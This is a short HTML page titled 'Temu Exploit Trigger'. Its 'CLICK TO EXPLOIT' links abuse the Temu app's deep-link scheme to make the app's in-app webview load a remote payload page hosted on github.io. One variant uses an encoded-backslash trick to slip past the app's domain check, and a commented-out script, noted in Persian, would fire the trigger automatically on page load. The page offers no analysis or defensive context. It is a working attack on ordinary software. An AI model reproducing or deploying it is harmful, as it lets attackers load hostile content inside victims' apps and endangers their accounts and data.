<html>
  <body>
    <h1>Temu Exploit Trigger</h1>
    <a href="temu://com.einnovation.temu/web?__bg_container_type=1&url=https://ferhadfaal.github.io/CV/temu/payload.html">
   CLICK TO EXPLOIT
</a><br>
    <a href="temu://com.einnovation.temu/web?__bg_container_type=1&url=https://ferhadfaal.github.io/CV%255c.temu.com/payload.html">
   CLICK FOR FULL EXPLOIT (Custom Path)
</a><br>
   
    <script>
      // یا به صورت خودکار اجرا شود
      // window.location.href = "temu://com.einnovation.temu/h5forward.html?__bg_container_type=1&url=https://ferhadfaal.github.io/CV/temu/payload.html";
    </script>
  </body>
</html>









